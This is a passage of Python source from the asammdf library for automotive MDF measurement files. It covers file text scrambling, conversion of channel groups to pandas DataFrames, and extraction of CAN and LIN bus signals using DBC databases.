if conv:
conv = ChannelConversion(
address=conv,
stream=stream,
mapped=False,
tx_map={},
si_map={},
)
for addr in (
conv.name_addr,
conv.unit_addr,
conv.comment_addr,
):
if addr and addr not in texts:
stream.seek(addr + 8)
size = UINT64_u(stream.read(8))[0] - 24
texts[addr] = randomized_string(size)
if conv.conversion_type == v4c.CONVERSION_TYPE_ALG:
addr = conv.formula_addr
if addr and addr not in texts:
stream.seek(addr + 8)
size = UINT64_u(stream.read(8))[0] - 24
texts[addr] = randomized_string(size)
if conv.referenced_blocks:
for key, block in conv.referenced_blocks.items():
if block:
if isinstance(block, bytes):
addr = conv[key]
if addr not in texts:
stream.seek(addr + 8)
size = len(block)
texts[addr] = randomized_string(size)
if callback:
callback(int(idx / count * 66), 100)
except:
print(
f"Error while scrambling the file: {format_exc()}.\nWill now use fallback method"
)
texts = MDF._fallback_scramble_mf4(name)
mdf.close()
dst = name.with_suffix(".scrambled.mf4")
copy(name, dst)
with open(dst, "rb+") as mdf:
count = len(texts)
chunk = max(count // 34, 1)
idx = 0
for index, (addr, bts) in enumerate(texts.items()):
mdf.seek(addr + 24)
mdf.write(bts)
if index % chunk == 0:
if callback:
callback(66 + idx, 100)
if callback:
callback(100, 100)
else:
ChannelConversion = ChannelConversionV3
stream = mdf._file
if mdf.header.comment_addr:
stream.seek(mdf.header.comment_addr + 2)
size = UINT16_u(stream.read(2))[0] - 4
texts[mdf.header.comment_addr + 4] = randomized_string(size)
texts[36 + 0x40] = randomized_string(32)
texts[68 + 0x40] = randomized_string(32)
texts[100 + 0x40] = randomized_string(32)
texts[132 + 0x40] = randomized_string(32)
for idx, gp in enumerate(mdf.groups, 1):
cg = gp.channel_group
addr = cg.comment_addr
if addr and addr not in texts:
stream.seek(addr + 2)
size = UINT16_u(stream.read(2))[0] - 4
texts[addr + 4] = randomized_string(size)
if gp.trigger:
addr = gp.trigger.text_addr
if addr:
stream.seek(addr + 2)
size = UINT16_u(stream.read(2))[0] - 4
texts[addr + 4] = randomized_string(size)
for ch in gp.channels:
for key in ("long_name_addr", "display_name_addr", "comment_addr"):
if hasattr(ch, key):
addr = getattr(ch, key)
else:
addr = 0
if addr and addr not in texts:
stream.seek(addr + 2)
size = UINT16_u(stream.read(2))[0] - 4
texts[addr + 4] = randomized_string(size)
texts[ch.address + 26] = randomized_string(32)
texts[ch.address + 58] = randomized_string(128)
source = ch.source_addr
if source:
source = ChannelExtension(address=source, stream=stream)
if source.type == v23c.SOURCE_ECU:
texts[source.address + 12] = randomized_string(80)
texts[source.address + 92] = randomized_string(32)
else:
texts[source.address + 14] = randomized_string(36)
texts[source.address + 50] = randomized_string(36)
conv = ch.conversion_addr
if conv:
texts[conv + 22] = randomized_string(20)
conv = ChannelConversion(address=conv, stream=stream)
if conv.conversion_type == v23c.CONVERSION_TYPE_FORMULA:
texts[conv + 36] = randomized_string(conv.block_len - 36)
if conv.referenced_blocks:
for key, block in conv.referenced_blocks.items():
if block:
if isinstance(block, bytes):
addr = conv[key]
if addr and addr not in texts:
stream.seek(addr + 2)
size = UINT16_u(stream.read(2))[0] - 4
texts[addr + 4] = randomized_string(size)
if callback:
callback(int(idx / count * 66), 100)
mdf.close()
dst = name.with_suffix(".scrambled.mdf")
copy(name, dst)
with open(dst, "rb+") as mdf:
chunk = count // 34
idx = 0
for index, (addr, bts) in enumerate(texts.items()):
mdf.seek(addr)
mdf.write(bts)
if chunk and index % chunk == 0:
if callback:
callback(66 + idx, 100)
if callback:
callback(100, 100)
return dst
@staticmethod
def _fallback_scramble_mf4(name):
"""scramble text blocks and keep original file structure
Parameters
----------
name : str | pathlib.Path
file name
Returns
-------
name : pathlib.Path
scrambled file name
"""
name = Path(name)
pattern = re.compile(
rb"(?P<block>##(TX|MD))",
re.DOTALL | re.MULTILINE,
)
texts = {}
with open(name, "rb") as stream:
stream.seek(0, 2)
file_limit = stream.tell()
stream.seek(0)
for match in re.finditer(pattern, stream.read()):
start = match.start()
if file_limit - start >= 24:
stream.seek(start + 8)
(size,) = UINT64_u(stream.read(8))
if start + size <= file_limit:
texts[start + 24] = randomized_string(size - 24)
return texts
def get_group(
self,
index,
channels=None,
raster=None,
time_from_zero=True,
empty_channels="skip",
keep_arrays=False,
use_display_names=False,
time_as_date=False,
reduce_memory_usage=False,
raw=False,
ignore_value2text_conversions=False,
only_basenames=False,
):
"""get channel group as pandas DataFrames. If there are multiple
occurrences for the same channel name, then a counter will be used to
make the names unique (<original_name>_<counter>)
Parameters
----------
index : int
channel group index
use_display_names : bool
use display name instead of standard channel name, if available.
reduce_memory_usage : bool
reduce memory usage by converting all float columns to float32 and
searching for minimum dtype that can reprezent the values found
in integer columns; default *False*
raw (False) : bool
the dataframe will contain the raw channel values
.. versionadded:: 5.7.0
ignore_value2text_conversions (False) : bool
valid only for the channels that have value to text conversions and
if *raw=False*. If this is True then the raw numeric values will be
used, and the conversion will not be applied.
.. versionadded:: 5.8.0
keep_arrays (False) : bool
keep arrays and structure channels as well as the
component channels. If *True* this can be very slow. If *False*
only the component channels are saved, and their names will be
prefixed with the parent channel.
.. versionadded:: 5.8.0
empty_channels ("skip") : str
behaviour for channels without samples; the options are *skip* or
*zeros*; default is *skip*
.. versionadded:: 5.8.0
only_basenames (False) : bool
use just the field names, without prefix, for structures and channel
arrays
.. versionadded:: 5.13.0
raster : float | np.array | str
new raster that can be
* a float step value
* a channel name who's timestamps will be used as raster (starting with asammdf 5.5.0)
* an array (starting with asammdf 5.5.0)
see `resample` for examples of using this argument
Returns
-------
df : pandas.DataFrame
"""
channels = [
(None, gp_index, ch_index)
for gp_index, channel_indexes in self.included_channels(index)[
index
].items()
for ch_index in channel_indexes
]
return self.to_dataframe(
channels=channels,
raster=raster,
time_from_zero=time_from_zero,
empty_channels=empty_channels,
keep_arrays=keep_arrays,
use_display_names=use_display_names,
time_as_date=time_as_date,
reduce_memory_usage=reduce_memory_usage,
raw=raw,
ignore_value2text_conversions=ignore_value2text_conversions,
only_basenames=only_basenames,
)
def iter_to_dataframe(
self,
channels=None,
raster=None,
time_from_zero=True,
empty_channels="skip",
keep_arrays=False,
use_display_names=False,
time_as_date=False,
reduce_memory_usage=False,
raw=False,
ignore_value2text_conversions=False,
use_interpolation=True,
only_basenames=False,
chunk_ram_size=200 * 1024 * 1024,
interpolate_outwards_with_nan=False,
):
"""generator that yields pandas DataFrame's that should not exceed
200MB of RAM
.. versionadded:: 5.15.0
Parameters
----------
channels : list
list of items to be filtered (default None); each item can be :
* a channel name string
* (channel name, group index, channel index) list or tuple
* (channel name, group index) list or tuple
* (None, group index, channel index) list or tuple
raster : float | np.array | str
new raster that can be
* a float step value
* a channel name who's timestamps will be used as raster (starting with asammdf 5.5.0)
* an array (starting with asammdf 5.5.0)
see `resample` for examples of using this argument
time_from_zero : bool
adjust time channel to start from 0; default *True*
empty_channels : str
behaviour for channels without samples; the options are *skip* or
*zeros*; default is *skip*
use_display_names : bool
use display name instead of standard channel name, if available.
keep_arrays : bool
keep arrays and structure channels as well as the
component channels. If *True* this can be very slow. If *False*
only the component channels are saved, and their names will be
prefixed with the parent channel.
time_as_date : bool
the dataframe index will contain the datetime timestamps
according to the measurement start time; default *False*. If
*True* then the argument ``time_from_zero`` will be ignored.
reduce_memory_usage : bool
reduce memory usage by converting all float columns to float32 and
searching for minimum dtype that can reprezent the values found
in integer columns; default *False*
raw (False) : bool
the columns will contain the raw values
ignore_value2text_conversions (False) : bool
valid only for the channels that have value to text conversions and
if *raw=False*. If this is True then the raw numeric values will be
used, and the conversion will not be applied.
use_interpolation (True) : bool
option to perform interpoaltions when multiple timestamp raster are
present. If *False* then dataframe columns will be automatically
filled with NaN's were the dataframe index values are not found in
the current column's timestamps
only_basenames (False) : bool
use jsut the field names, without prefix, for structures and channel
arrays
interpolate_outwards_with_nan : bool
use NaN values for the samples that lie outside of the original
signal's timestamps
chunk_ram_size : int
desired data frame RAM usage in bytes; default 200 MB
Returns
-------
dataframe : pandas.DataFrame
yields pandas DataFrame's that should not exceed 200MB of RAM
"""
if channels:
mdf = self.filter(channels)
result = mdf.iter_to_dataframe(
raster=raster,
time_from_zero=time_from_zero,
empty_channels=empty_channels,
keep_arrays=keep_arrays,
use_display_names=use_display_names,
time_as_date=time_as_date,
reduce_memory_usage=reduce_memory_usage,
raw=raw,
ignore_value2text_conversions=ignore_value2text_conversions,
use_interpolation=use_interpolation,
only_basenames=only_basenames,
chunk_ram_size=chunk_ram_size,
interpolate_outwards_with_nan=interpolate_outwards_with_nan,
)
for df in result:
yield df
mdf.close()
df = {}
self._set_temporary_master(None)
if raster is not None:
try:
raster = float(raster)
assert raster > 0
except (TypeError, ValueError):
if isinstance(raster, str):
raster = self.get(
raster, raw=True, ignore_invalidation_bits=True
).timestamps
else:
raster = np.array(raster)
else:
raster = master_using_raster(self, raster)
master = raster
else:
masters = {index: self.get_master(index) for index in self.virtual_groups}
if masters:
master = reduce(np.union1d, masters.values())
else:
master = np.array([], dtype="<f4")
master_ = master
channel_count = sum(len(gp.channels) - 1 for gp in self.groups) + 1
# approximation with all float64 dtype
itemsize = channel_count * 8
# use 200MB DataFrame chunks
chunk_count = chunk_ram_size // itemsize or 1
chunks, r = divmod(len(master), chunk_count)
if r:
chunks += 1
for i in range(chunks):
master = master_[chunk_count * i : chunk_count * (i + 1)]
start = master[0]
end = master[-1]
df = {}
self._set_temporary_master(None)
used_names = UniqueDB()
used_names.get_unique_name("timestamps")
groups_nr = len(self.virtual_groups)
for group_index, virtual_group in self.virtual_groups.items():
group_cycles = virtual_group.cycles_nr
if group_cycles == 0 and empty_channels == "skip":
continue
record_offset = max(
np.searchsorted(masters[group_index], start).flatten()[0] - 1, 0
)
stop = np.searchsorted(masters[group_index], end).flatten()[0]
record_count = min(stop - record_offset + 1, group_cycles)
channels = [
(None, gp_index, ch_index)
for gp_index, channel_indexes in self.included_channels(
group_index
)[group_index].items()
for ch_index in channel_indexes
]
signals = [
signal
for signal in self.select(
channels,
raw=True,
copy_master=False,
record_offset=record_offset,
record_count=record_count,
validate=False,
)
]
if not signals:
continue
group_master = signals[0].timestamps
for sig in signals:
if len(sig) == 0:
if empty_channels == "zeros":
sig.samples = np.zeros(
len(master)
if virtual_group.cycles_nr == 0
else virtual_group.cycles_nr,
dtype=sig.samples.dtype,
)
sig.timestamps = (
master if virtual_group.cycles_nr == 0 else group_master
)
if not raw:
if ignore_value2text_conversions:
if self.version < "4.00":
text_conversion = 11
else:
text_conversion = 7
for signal in signals:
conversion = signal.conversion
if (
conversion
and conversion.conversion_type < text_conversion
):
signal.samples = conversion.convert(signal.samples)
else:
for signal in signals:
if signal.conversion:
signal.samples = signal.conversion.convert(
signal.samples
)
for s_index, sig in enumerate(signals):
sig = sig.validate(copy=False)
if len(sig) == 0:
if empty_channels == "zeros":
sig.samples = np.zeros(
len(master)
if virtual_group.cycles_nr == 0
else virtual_group.cycles_nr,
dtype=sig.samples.dtype,
)
sig.timestamps = (
master if virtual_group.cycles_nr == 0 else group_master
)
signals[s_index] = sig
if use_interpolation:
same_master = np.array_equal(master, group_master)
if not same_master and interpolate_outwards_with_nan:
idx = np.argwhere(
(master >= group_master[0]) & (master <= group_master[-1])
).flatten()
cycles = len(group_master)
signals = [
signal.interp(master, self._integer_interpolation)
if not same_master or len(signal) != cycles
else signal
for signal in signals
]
if not same_master and interpolate_outwards_with_nan:
for sig in signals:
sig.timestamps = sig.timestamps[idx]
sig.samples = sig.samples[idx]
group_master = master
signals = [sig for sig in signals if len(sig)]
if signals:
diffs = np.diff(group_master, prepend=-np.inf) > 0
if np.all(diffs):
index = pd.Index(group_master, tupleize_cols=False)
else:
idx = np.argwhere(diffs).flatten()
group_master = group_master[idx]
index = pd.Index(group_master, tupleize_cols=False)
for sig in signals:
sig.samples = sig.samples[idx]
sig.timestamps = sig.timestamps[idx]
size = len(index)
for k, sig in enumerate(signals):
sig_index = (
index
if len(sig) == size
else pd.Index(sig.timestamps, tupleize_cols=False)
)
# byte arrays
if len(sig.samples.shape) > 1:
if use_display_names:
channel_name = sig.display_name or sig.name
else:
channel_name = sig.name
channel_name = used_names.get_unique_name(channel_name)
df[channel_name] = pd.Series(
list(sig.samples),
index=sig_index,
)
# arrays and structures
elif sig.samples.dtype.names:
for name, series in components(
sig.samples,
sig.name,
used_names,
master=sig_index,
only_basenames=only_basenames,
):
df[name] = series
# scalars
else:
if use_display_names:
channel_name = sig.display_name or sig.name
else:
channel_name = sig.name
channel_name = used_names.get_unique_name(channel_name)
if reduce_memory_usage and sig.samples.dtype.kind in "SU":
unique = np.unique(sig.samples)
if len(sig.samples) / len(unique) >= 2:
df[channel_name] = pd.Series(
sig.samples,
index=sig_index,
dtype="category",
)
else:
df[channel_name] = pd.Series(
sig.samples,
index=sig_index,
fastpath=True,
)
else:
if reduce_memory_usage:
sig.samples = downcast(sig.samples)
df[channel_name] = pd.Series(
sig.samples,
index=sig_index,
fastpath=True,
)
if self._callback:
self._callback(group_index + 1, groups_nr)
strings, nonstrings = {}, {}
for col, series in df.items():
if series.dtype.kind == "S":
strings[col] = series
else:
nonstrings[col] = series
df = pd.DataFrame(nonstrings, index=master)
for col, series in strings.items():
df[col] = series
df.index.name = "timestamps"
if time_as_date:
new_index = np.array(df.index) + self.header.start_time.timestamp()
new_index = pd.to_datetime(new_index, unit="s")
df.set_index(new_index, inplace=True)
elif time_from_zero and len(master):
df.set_index(df.index - df.index[0], inplace=True)
yield df
def to_dataframe(
self,
channels=None,
raster=None,
time_from_zero=True,
empty_channels="skip",
keep_arrays=False,
use_display_names=False,
time_as_date=False,
reduce_memory_usage=False,
raw=False,
ignore_value2text_conversions=False,
use_interpolation=True,
only_basenames=False,
interpolate_outwards_with_nan=False,
):
"""generate pandas DataFrame
Parameters
----------
channels : list
list of items to be filtered (default None); each item can be :
* a channel name string
* (channel name, group index, channel index) list or tuple
* (channel name, group index) list or tuple
* (None, group index, channel index) list or tuple
raster : float | np.array | str
new raster that can be
* a float step value
* a channel name who's timestamps will be used as raster (starting with asammdf 5.5.0)
* an array (starting with asammdf 5.5.0)
see `resample` for examples of using this argument
time_from_zero : bool
adjust time channel to start from 0; default *True*
empty_channels : str
behaviour for channels without samples; the options are *skip* or
*zeros*; default is *skip*
use_display_names : bool
use display name instead of standard channel name, if available.
keep_arrays : bool
keep arrays and structure channels as well as the
component channels. If *True* this can be very slow. If *False*
only the component channels are saved, and their names will be
prefixed with the parent channel.
time_as_date : bool
the dataframe index will contain the datetime timestamps
according to the measurement start time; default *False*. If
*True* then the argument ``time_from_zero`` will be ignored.
reduce_memory_usage : bool
reduce memory usage by converting all float columns to float32 and
searching for minimum dtype that can reprezent the values found
in integer columns; default *False*
raw (False) : bool
the columns will contain the raw values
.. versionadded:: 5.7.0
ignore_value2text_conversions (False) : bool
valid only for the channels that have value to text conversions and
if *raw=False*. If this is True then the raw numeric values will be
used, and the conversion will not be applied.
.. versionadded:: 5.8.0
use_interpolation (True) : bool
option to perform interpoaltions when multiple timestamp raster are
present. If *False* then dataframe columns will be automatically
filled with NaN's were the dataframe index values are not found in
the current column's timestamps
.. versionadded:: 5.11.0
only_basenames (False) : bool
use just the field names, without prefix, for structures and channel
arrays
.. versionadded:: 5.13.0
interpolate_outwards_with_nan : bool
use NaN values for the samples that lie outside of the original
signal's timestamps
.. versionadded:: 5.15.0
Returns
-------
dataframe : pandas.DataFrame
"""
if channels is not None:
mdf = self.filter(channels)
result = mdf.to_dataframe(
raster=raster,
time_from_zero=time_from_zero,
empty_channels=empty_channels,
keep_arrays=keep_arrays,
use_display_names=use_display_names,
time_as_date=time_as_date,
reduce_memory_usage=reduce_memory_usage,
raw=raw,
ignore_value2text_conversions=ignore_value2text_conversions,
use_interpolation=use_interpolation,
only_basenames=only_basenames,
interpolate_outwards_with_nan=interpolate_outwards_with_nan,
)
mdf.close()
return result
df = {}
self._set_temporary_master(None)
if raster is not None:
try:
raster = float(raster)
assert raster > 0
except (TypeError, ValueError):
if isinstance(raster, str):
raster = self.get(raster).timestamps
else:
raster = np.array(raster)
else:
raster = master_using_raster(self, raster)
master = raster
else:
masters = {index: self.get_master(index) for index in self.virtual_groups}
if masters:
master = reduce(np.union1d, masters.values())
else:
master = np.array([], dtype="<f4")
del masters
idx = np.argwhere(np.diff(master, prepend=-np.inf) > 0).flatten()
master = master[idx]
used_names = UniqueDB()
used_names.get_unique_name("timestamps")
groups_nr = len(self.virtual_groups)
for group_index, (virtual_group_index, virtual_group) in enumerate(
self.virtual_groups.items()
):
if virtual_group.cycles_nr == 0 and empty_channels == "skip":
continue
channels = [
(None, gp_index, ch_index)
for gp_index, channel_indexes in self.included_channels(
virtual_group_index
)[virtual_group_index].items()
for ch_index in channel_indexes
if ch_index != self.masters_db.get(gp_index, None)
]
signals = [
signal
for signal in self.select(
channels, raw=True, copy_master=False, validate=False
)
]
if not signals:
continue
group_master = signals[0].timestamps
for sig in signals:
if len(sig) == 0:
if empty_channels == "zeros":
sig.samples = np.zeros(
len(master)
if virtual_group.cycles_nr == 0
else virtual_group.cycles_nr,
dtype=sig.samples.dtype,
)
sig.timestamps = (
master if virtual_group.cycles_nr == 0 else group_master
)
if not raw:
if ignore_value2text_conversions:
for signal in signals:
conversion = signal.conversion
if conversion:
samples = conversion.convert(signal.samples)
if samples.dtype.kind not in "US":
signal.samples = samples
else:
for signal in signals:
if signal.conversion:
signal.samples = signal.conversion.convert(signal.samples)
for s_index, sig in enumerate(signals):
sig = sig.validate(copy=False)
if len(sig) == 0:
if empty_channels == "zeros":
sig.samples = np.zeros(
len(master)
if virtual_group.cycles_nr == 0
else virtual_group.cycles_nr,
dtype=sig.samples.dtype,
)
sig.timestamps = (
master if virtual_group.cycles_nr == 0 else group_master
)
signals[s_index] = sig
if use_interpolation:
same_master = np.array_equal(master, group_master)
if not same_master and interpolate_outwards_with_nan:
idx = np.argwhere(
(master >= group_master[0]) & (master <= group_master[-1])
).flatten()
cycles = len(group_master)
signals = [
signal.interp(master, self._integer_interpolation)
if not same_master or len(signal) != cycles
else signal
for signal in signals
]
if not same_master and interpolate_outwards_with_nan:
for sig in signals:
sig.timestamps = sig.timestamps[idx]
sig.samples = sig.samples[idx]
group_master = master
signals = [sig for sig in signals if len(sig)]
if signals:
diffs = np.diff(group_master, prepend=-np.inf) > 0
if np.all(diffs):
index = pd.Index(group_master, tupleize_cols=False)
else:
idx = np.argwhere(diffs).flatten()
group_master = group_master[idx]
index = pd.Index(group_master, tupleize_cols=False)
for sig in signals:
sig.samples = sig.samples[idx]
sig.timestamps = sig.timestamps[idx]
size = len(index)
for k, sig in enumerate(signals):
sig_index = (
index
if len(sig) == size
else pd.Index(sig.timestamps, tupleize_cols=False)
)
# byte arrays
if len(sig.samples.shape) > 1:
if use_display_names:
channel_name = sig.display_name or sig.name
else:
channel_name = sig.name
channel_name = used_names.get_unique_name(channel_name)
df[channel_name] = pd.Series(
list(sig.samples),
index=sig_index,
)
# arrays and structures
elif sig.samples.dtype.names:
for name, series in components(
sig.samples,
sig.name,
used_names,
master=sig_index,
only_basenames=only_basenames,
):
df[name] = series
# scalars
else:
if use_display_names:
channel_name = sig.display_name or sig.name
else:
channel_name = sig.name
channel_name = used_names.get_unique_name(channel_name)
if reduce_memory_usage and sig.samples.dtype.kind not in "SU":
sig.samples = downcast(sig.samples)
df[channel_name] = pd.Series(
sig.samples, index=sig_index, fastpath=True
)
if self._callback:
self._callback(group_index + 1, groups_nr)
strings, nonstrings = {}, {}
for col, series in df.items():
if series.dtype.kind == "S":
strings[col] = series
else:
nonstrings[col] = series
df = pd.DataFrame(nonstrings, index=master)
for col, series in strings.items():
df[col] = series
df.index.name = "timestamps"
if time_as_date:
new_index = np.array(df.index) + self.header.start_time.timestamp()
new_index = pd.to_datetime(new_index, unit="s")
df.set_index(new_index, inplace=True)
elif time_from_zero and len(master):
df.set_index(df.index - df.index[0], inplace=True)
return df
def extract_bus_logging(
self,
database_files,
version=None,
ignore_invalid_signals=False,
consolidated_j1939=True,
ignore_value2text_conversion=True,
):
"""extract all possible CAN signal using the provided databases.
Changed in version 6.0.0 from `extract_can_logging`
Parameters
----------
database_files : dict
each key will contain an iterable of database files for that bus type. The
supported bus types are "CAN", "LIN". The iterables will contain the
databases as str, pathlib.Path or canamtrix.CanMatrix objects
.. versionchanged:: 6.0.0 added canmatrix.CanMatrix type
version (None) : str
output file version
ignore_invalid_signals (False) : bool
ignore signals that have all samples equal to their maximum value
.. versionadded:: 5.7.0
consolidated_j1939 (True) : bool
handle PGNs from all the messages as a single instance
.. versionadded:: 5.7.0
ignore_value2text_conversion (True): bool
ignore value to text conversions
.. versionadded:: 5.23.0
Returns
-------
mdf : MDF
new MDF file that contains the succesfully extracted signals
Examples
--------
>>> "extrac CAN and LIN bus logging"
>>> mdf = asammdf.MDF(r'bus_logging.mf4')
>>> databases = {
... "CAN": ["file1.dbc", "file2.arxml"],
... "LIN": ["file3.dbc"],
... }
>>> extracted = mdf.extract_bus_logging(database_files=database_files)
>>> ...
>>> "extrac just LIN bus logging"
>>> mdf = asammdf.MDF(r'bus_logging.mf4')
>>> databases = {
... "LIN": ["file3.dbc"],
... }
>>> extracted = mdf.extract_bus_logging(database_files=database_files)
"""
if version is None:
version = self.version
else:
version = validate_version_argument(version)
out = MDF(
version=version,
encryption_function=self._encryption_function,
decryption_function=self._decryption_function,
callback=self._callback,
)
out.header.start_time = self.header.start_time
if self._callback:
out._callback = out._mdf._callback = self._callback
self.last_call_info = {}
if database_files.get("CAN", None):
out = self._extract_can_logging(
out,
database_files["CAN"],
ignore_invalid_signals,
consolidated_j1939,
ignore_value2text_conversion,
)
if database_files.get("LIN", None):
out = self._extract_lin_logging(
out,
database_files["LIN"],
ignore_invalid_signals,
ignore_value2text_conversion,
)
return out
def _extract_can_logging(
self,
output_file,
dbc_files,
ignore_invalid_signals=False,
consolidated_j1939=True,
ignore_value2text_conversion=True,
):
out = output_file
max_flags = []
valid_dbc_files = []
unique_name = UniqueDB()
for dbc_name in dbc_files:
if isinstance(dbc_name, CanMatrix):
valid_dbc_files.append(
(dbc_name, unique_name.get_unique_name("UserProvidedCanMatrix"))
)
else:
dbc = load_can_database(Path(dbc_name))
if dbc is None:
continue
else:
valid_dbc_files.append((dbc, dbc_name))
count = sum(
1
for group in self.groups
if group.channel_group.flags & v4c.FLAG_CG_BUS_EVENT
and group.channel_group.acq_source.bus_type == v4c.BUS_TYPE_CAN
)
count *= len(valid_dbc_files)
cntr = 0
total_unique_ids = set()
found_ids = defaultdict(set)
not_found_ids = defaultdict(list)
unknown_ids = defaultdict(list)
for dbc, dbc_name in valid_dbc_files:
is_j1939 = dbc.contains_j1939
if is_j1939:
messages = {message.arbitration_id.pgn: message for message in dbc}
else:
messages = {message.arbitration_id.id: message for message in dbc}
current_not_found_ids = {
(msg_id, message.name) for msg_id, message in messages.items()
}
msg_map = {}
for i, group in enumerate(self.groups):
if (
not group.channel_group.flags & v4c.FLAG_CG_BUS_EVENT
or not group.channel_group.acq_source.bus_type == v4c.BUS_TYPE_CAN
or not "CAN_DataFrame" in [ch.name for ch in group.channels]
):
continue
parents, dtypes = self._prepare_record(group)
data = self._load_data(group, optimize_read=False)
for fragment_index, fragment in enumerate(data):
if dtypes.itemsize:
group.record = np.core.records.fromstring(
fragment[0], dtype=dtypes
)
else:
group.record = None
continue
self._set_temporary_master(None)
self._set_temporary_master(self.get_master(i, data=fragment))
bus_ids = self.get(
"CAN_DataFrame.BusChannel",
group=i,
data=fragment,
samples_only=True,
)[0].astype("<u1")
msg_ids = (
self.get("CAN_DataFrame.ID", group=i, data=fragment).astype(
"<u4"
)
& 0x1FFFFFFF
)
original_ids = msg_ids.samples.copy()
if is_j1939:
ps = (msg_ids.samples >> 8) & 0xFF
pf = (msg_ids.samples >> 16) & 0xFF
_pgn = pf << 8
msg_ids.samples = np.where(pf >= 240, _pgn + ps, _pgn)
data_bytes = self.get(
"CAN_DataFrame.DataBytes",
group=i,
data=fragment,
samples_only=True,
)[0]
buses = np.unique(bus_ids)
for bus in buses:
idx = np.argwhere(bus_ids == bus).ravel()
bus_t = msg_ids.timestamps[idx]
bus_msg_ids = msg_ids.samples[idx]
bus_data_bytes = data_bytes[idx]
original_msg_ids = original_ids[idx]
if is_j1939 and not consolidated_j1939:
unique_ids = np.unique(
np.core.records.fromarrays([bus_msg_ids, original_ids])
)
else:
unique_ids = np.unique(
np.core.records.fromarrays([bus_msg_ids, bus_msg_ids])
)
total_unique_ids = total_unique_ids | set(
tuple(int(e) for e in f) for f in unique_ids
)
for msg_id_record in unique_ids:
msg_id = int(msg_id_record[0])
original_msg_id = int(msg_id_record[1])
message = messages.get(msg_id, None)
if message is None:
unknown_ids[msg_id].append(True)
continue
found_ids[dbc_name].add((msg_id, message.name))
try:
current_not_found_ids.remove((msg_id, message.name))
except KeyError:
pass
unknown_ids[msg_id].append(False)
if is_j1939 and not consolidated_j1939:
idx = np.argwhere(
(bus_msg_ids == msg_id)
& (original_msg_ids == original_msg_id)
).ravel()
else:
idx = np.argwhere(bus_msg_ids == msg_id).ravel()
payload = bus_data_bytes[idx]
t = bus_t[idx]
extracted_signals = extract_mux(
payload,
message,
msg_id,
bus,
t,
original_message_id=original_msg_id
if is_j1939 and not consolidated_j1939
else None,
ignore_value2text_conversion=ignore_value2text_conversion,
)
for entry, signals in extracted_signals.items():
if len(next(iter(signals.values()))["samples"]) == 0:
continue
if entry not in msg_map:
sigs = []
index = len(out.groups)
msg_map[entry] = index
for name_, signal in signals.items():
sig = Signal(
samples=signal["samples"],
timestamps=signal["t"],
name=signal["name"],
comment=signal["comment"],
unit=signal["unit"],
invalidation_bits=signal[
"invalidation_bits"
]
if ignore_invalid_signals
else None,
)
sig.comment = f"""\
<CNcomment>
<TX>{sig.comment}</TX>
<names>
<display>
CAN{bus}.{message.name}.{signal['name']}
</display>
</names>
</CNcomment>"""
sigs.append(sig)
cg_nr = out.append(
sigs,
acq_name=f"from CAN{bus} message ID=0x{msg_id:X}",
comment=f"{message} 0x{msg_id:X}",
common_timebase=True,
)
if ignore_invalid_signals:
max_flags.append([False])
for ch_index, sig in enumerate(sigs, 1):
max_flags[cg_nr].append(
np.all(sig.invalidation_bits)
)
else:
index = msg_map[entry]
sigs = []
for name_, signal in signals.items():
sigs.append(
(
signal["samples"],
signal["invalidation_bits"]
if ignore_invalid_signals
else None,
)
)
t = signal["t"]
if ignore_invalid_signals:
for ch_index, sig in enumerate(sigs, 1):
max_flags[index][ch_index] = max_flags[
index
][ch_index] or np.all(sig[1])
sigs.insert(0, (t, None))
out.extend(index, sigs)
self._set_temporary_master(None)
group.record = None
cntr += 1
if self._callback:
self._callback(cntr, count)
if current_not_found_ids:
not_found_ids[dbc_name] = list(current_not_found_ids)
unknown_ids = {
msg_id for msg_id, not_found in unknown_ids.items() if all(not_found)
}
self.last_call_info["CAN"] = {
"dbc_files": dbc_files,
"total_unique_ids": total_unique_ids,
"unknown_id_count": len(unknown_ids),
"not_found_ids": not_found_ids,
"found_ids": found_ids,
"unknown_ids": unknown_ids,
}
if ignore_invalid_signals:
to_keep = []
for i, group in enumerate(out.groups):
for j, channel in enumerate(group.channels[1:], 1):
if not max_flags[i][j]:
to_keep.append((None, i, j))
tmp = out.filter(to_keep, out.version)
out.close()
out = tmp
if self._callback:
self._callback(100, 100)
if not out.groups:
logger.warning(
f'No CAN signals could be extracted from "{self.name}". The'
"output file will be empty."
)
return out
def _extract_lin_logging(
self,
output_file,
dbc_files,
ignore_invalid_signals=False,
ignore_value2text_conversion=True,
):
out = output_file
max_flags = []
valid_dbc_files = []
unique_name = UniqueDB()
for dbc_name in dbc_files:
if isinstance(dbc_name, CanMatrix):
valid_dbc_files.append(
(dbc_name, unique_name.get_unique_name("UserProvidedCanMatrix"))
)
else:
dbc = load_can_database(Path(dbc_name))
if dbc is None:
continue
else:
valid_dbc_files.append((dbc, dbc_name))
count = sum(
1
for group in self.groups
if group.channel_group.flags & v4c.FLAG_CG_BUS_EVENT
and group.channel_group.acq_source.bus_type == v4c.BUS_TYPE_LIN
)
count *= len(valid_dbc_files)
cntr = 0
total_unique_ids = set()
found_ids = defaultdict(set)
not_found_ids = defaultdict(list)
unknown_ids = defaultdict(list)
for dbc, dbc_name in valid_dbc_files:
messages = {message.arbitration_id.id: message for message in dbc}
current_not_found_ids = {
(msg_id, message.name) for msg_id, message in messages.items()
}
msg_map = {}
for i, group in enumerate(self.groups):
if (
not group.channel_group.flags & v4c.FLAG_CG_BUS_EVENT
or not group.channel_group.acq_source.bus_type == v4c.BUS_TYPE_LIN
or not "LIN_Frame" in [ch.name for ch in group.channels]
):
continue
parents, dtypes = self._prepare_record(group)
data = self._load_data(group, optimize_read=False)
for fragment_index, fragment in enumerate(data):
if dtypes.itemsize:
group.record = np.core.records.fromstring(
fragment[0], dtype=dtypes
)
else:
group.record = None
continue
self._set_temporary_master(None)
self._set_temporary_master(self.get_master(i, data=fragment))
msg_ids = (
self.get("LIN_Frame.ID", group=i, data=fragment).astype("<u4")
& 0x1FFFFFFF
)
original_ids = msg_ids.samples.copy()
data_bytes = self.get(
"LIN_Frame.DataBytes",
group=i,
data=fragment,
samples_only=True,
)[0]
bus_t = msg_ids.timestamps
bus_msg_ids = msg_ids.samples
bus_data_bytes = data_bytes
original_msg_ids = original_ids
unique_ids = np.unique(
np.core.records.fromarrays([bus_msg_ids, bus_msg_ids])
)
total_unique_ids = total_unique_ids | set(
tuple(int(e) for e in f) for f in unique_ids
)
for msg_id_record in unique_ids:
msg_id = int(msg_id_record[0])
original_msg_id = int(msg_id_record[1])
message = messages.get(msg_id, None)
if message is None:
unknown_ids[msg_id].append(True)
continue
found_ids[dbc_name].add((msg_id, message.name))
